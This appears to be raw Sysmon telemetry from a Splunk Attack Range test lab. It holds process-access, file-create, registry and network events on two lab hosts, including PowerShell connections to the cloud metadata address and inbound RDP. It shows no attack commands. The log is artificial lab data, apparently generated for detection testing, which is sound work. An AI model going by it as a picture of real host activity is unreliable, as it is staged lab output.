T4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001056073Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:05.100{5EBD8912-8CD0-6151-2C00-00000000FD01}24243124C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\tileobjserver.dll+bce2|c:\windows\system32\tileobjserver.dll+26da2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001056072Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:05.100{5EBD8912-8CD0-6151-2C00-00000000FD01}24243124C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|c:\windows\system32\tileobjserver.dll+bc8f|c:\windows\system32\tileobjserver.dll+26da2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a 10341000x80000000000000001056071Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:05.100{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001056070Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:05.100{5EBD8912-8D29-6151-8D00-00000000FD01}41364420C:\Windows\system32\sihost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+386f0|C:\Windows\System32\modernexecserver.dll+2ff00|C:\Windows\System32\modernexecserver.dll+1e81d|C:\Windows\System32\modernexecserver.dll+1e514|C:\Windows\System32\modernexecserver.dll+49142|C:\Windows\System32\modernexecserver.dll+14a47|C:\Windows\SYSTEM32\ntdll.dll+3a940|C:\Windows\SYSTEM32\ntdll.dll+1e86f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000980921Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:01.523{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-59857-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000980923Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:06.933{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64B055554C5D58F22E136D6D8D509003,SHA256=ED7E02C16470BE108C883B60D1CA75888544EED4CA9C3793FF4A8A5A02F70E6F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001056111Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:04.773{5EBD8912-8D37-6151-9D00-00000000FD01}2644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-429.attackrange.local54215-false169.254.169.254-80http 354300x80000000000000001056110Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:04.741{5EBD8912-8D37-6151-9D00-00000000FD01}2644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-429.attackrange.local54214-false169.254.169.254-80http 354300x80000000000000001056109Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:04.711{5EBD8912-8D37-6151-9D00-00000000FD01}2644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-429.attackrange.local54213-false169.254.169.254-80http 354300x80000000000000001056108Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:04.685{5EBD8912-8D37-6151-9D00-00000000FD01}2644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-429.attackrange.local54212-false169.254.169.254-80http 354300x80000000000000001056107Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:04.638{5EBD8912-8D37-6151-9D00-00000000FD01}2644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-429.attackrange.local54211-false169.254.169.254-80http 354300x80000000000000001056106Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:04.583{5EBD8912-8D37-6151-9D00-00000000FD01}2644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-429.attackrange.local54210-false169.254.169.254-80http 23542300x80000000000000001056105Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:06.429{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=FFD000944FEFD35A16C9DD27EBAEA660,SHA256=7EF4974D426EED364C15E043C5E33062D2366AADD827C74F49E060A22963B9D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056104Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:06.241{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89455DF57CA4108C19B3E713A375CA0D,SHA256=EACD1FC9C25F5B0373B2A209EE794F258BAD9BA7F49B89FB9ED11ECCEAF86016,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056103Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:06.163{5EBD8912-8D2A-6151-9600-00000000FD01}46324956C:\Windows\Explorer.EXE{5EBD8912-8D2A-6151-9700-00000000FD01}4736C:\Windows\System32\win32calc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056102Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:06.163{5EBD8912-8D2A-6151-9600-00000000FD01}46324956C:\Windows\Explorer.EXE{5EBD8912-8D2A-6151-9700-00000000FD01}4736C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056101Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:06.163{5EBD8912-8D2A-6151-9600-00000000FD01}46324956C:\Windows\Explorer.EXE{5EBD8912-8D2A-6151-9700-00000000FD01}4736C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056100Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:06.148{5EBD8912-8D2A-6151-9600-00000000FD01}46324904C:\Windows\Explorer.EXE{5EBD8912-8D2A-6151-9700-00000000FD01}4736C:\Windows\System32\win32calc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62890|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056099Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:06.148{5EBD8912-8D2A-6151-9600-00000000FD01}46324904C:\Windows\Explorer.EXE{5EBD8912-8D2A-6151-9700-00000000FD01}4736C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+6284c|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056098Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:06.148{5EBD8912-8D2A-6151-9600-00000000FD01}46324904C:\Windows\Explorer.EXE{5EBD8912-8D2A-6151-9700-00000000FD01}4736C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62820|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056097Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:06.148{5EBD8912-8D2A-6151-9600-00000000FD01}46324904C:\Windows\Explorer.EXE{5EBD8912-8D2A-6151-9700-00000000FD01}4736C:\Windows\System32\win32calc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001056096Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:06.132{5EBD8912-8D37-6151-9D00-00000000FD01}2644ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056095Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:06.069{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5599D7E20EC4CC6E45A78B925FC2FDBC,SHA256=ED01D658126032C682DB7E630B83A1A178766AF0A761A567B2A38EB85C3E8F57,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980924Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:07.933{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F220A391D1571DEBF7902EB43592DC5,SHA256=7A5BF0B0D2BBBF7EE93FD488EF996343ECBB2E1653D5B5D24EA4B739E5DE9208,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056112Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:07.335{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40D52ACD0F9D5C99ED697FF0ABEE5EB1,SHA256=4D8FD4010302A7DAED81CB0065E016EBB788B8103783D3CF9D03E34E2A6187AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980926Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:08.933{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C975830375CDF43C9F87DA8DA856F87,SHA256=016A93D5214DC2EC2DF1E3D9DD54E5D74D5A4CB39A7A72F75CCC803320605060,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056114Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:08.570{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14EEA3AD72F92F537A816DBDEEEB4417,SHA256=07849D25D415A2971A2804E4C818BB8D96B5C42A393E282452BB624EABDD14B5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980925Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:04.759{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59519-false10.0.1.12-8000- 13241300x80000000000000001056113Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:22:08.398{5EBD8912-8CC0-6151-1000-00000000FD01}440C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7b381-0x25057daf) 23542300x8000000000000000980927Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:09.949{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=495F4B8A7DEFAFEED6A930F55D575539,SHA256=EE0D85E17B23D8F68D03D7A2496B18295F6294043D3DE71BBC3AA268B4871C92,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056117Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:09.805{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D084B4540B3808DD90C8B9B60278CAF7,SHA256=39BBF226D55C75F6E2E86FC4FD89FFA909B9265A09AEF0BB1C96BE2A0A487EEA,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001056116Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:08.023{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-63703-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001056115Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:09.399{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=71069100669117CF781337A764B72EDD,SHA256=06222829A6A87D2D45492A9F5BE74A17BB4364FA4672024FACA7E913FB7C0D6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980928Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:10.964{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB5EB83151F3FEEFFE282A7C11D0370E,SHA256=921DC4758F818ED0FB6ED282383598A1CC1851A4596858E5B569E1B79F795A1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056119Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:10.852{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01371EC26A49247F0BF92572D42D61E4,SHA256=6930E6C1E12A18BA38769F4A5F5AC2EE983DBD7C98C1BECAB712E6DC3B873247,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001056118Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:09.052{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54216-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000980929Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:11.964{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F4E592D28F94E551A7FA6B3BCE4B33D6,SHA256=97A7EEB9C7A0A4FE3CC3B1E911AC099F0021ECAEE0ED56342FC221D44A78928D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056120Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:11.884{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73D3316C1D524102BCFC1CD440C48183,SHA256=AFEF0FCAB433353EA146EFAD548E013FA9F858ED785D8127C475C4313B38BD88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056121Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:12.915{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA959FBD614AD2B1F0C8D6DF17C40625,SHA256=C1CED28252FF393B8A5D3C599B208CCE9B94A0272BBDF364BF8DFA99EA9F798F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980930Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:12.964{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02F97FA150AAA38551DACE4143BC2D4E,SHA256=D9F391D20AB78C2DE28A538EDCD1B6B9B9DE3AB8056C494A697D37A8EE32EE48,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056122Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:13.994{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F84C4EF8017ACB8FCE9BC615144A755E,SHA256=8CAEBB029C208F64E84401F5E522FD111736246247E1CFC360D4CE2859CD213A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980933Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:13.980{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D68D4965A256AC50CE02B3649FA50ED,SHA256=D9429EA6970385CE78B6E935C70EEC3A8C86EB3B4E172FA89DCBC76F38F7524D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980932Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:13.902{69CF5F33-7F29-614D-1D00-00000000FD01}1960NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980931Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:10.758{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59520-false10.0.1.12-8000- 23542300x8000000000000000980934Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:14.980{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6A9E0561E513B64C02BCB443523E94F,SHA256=A1CB451D620D2E0DFF2674F42E4094A459A5F3E1EF56BAEC292032B7C0DDB080,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980935Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:12.524{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59521-false10.0.1.12-8089- 354300x80000000000000001056125Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:14.068{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54217-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 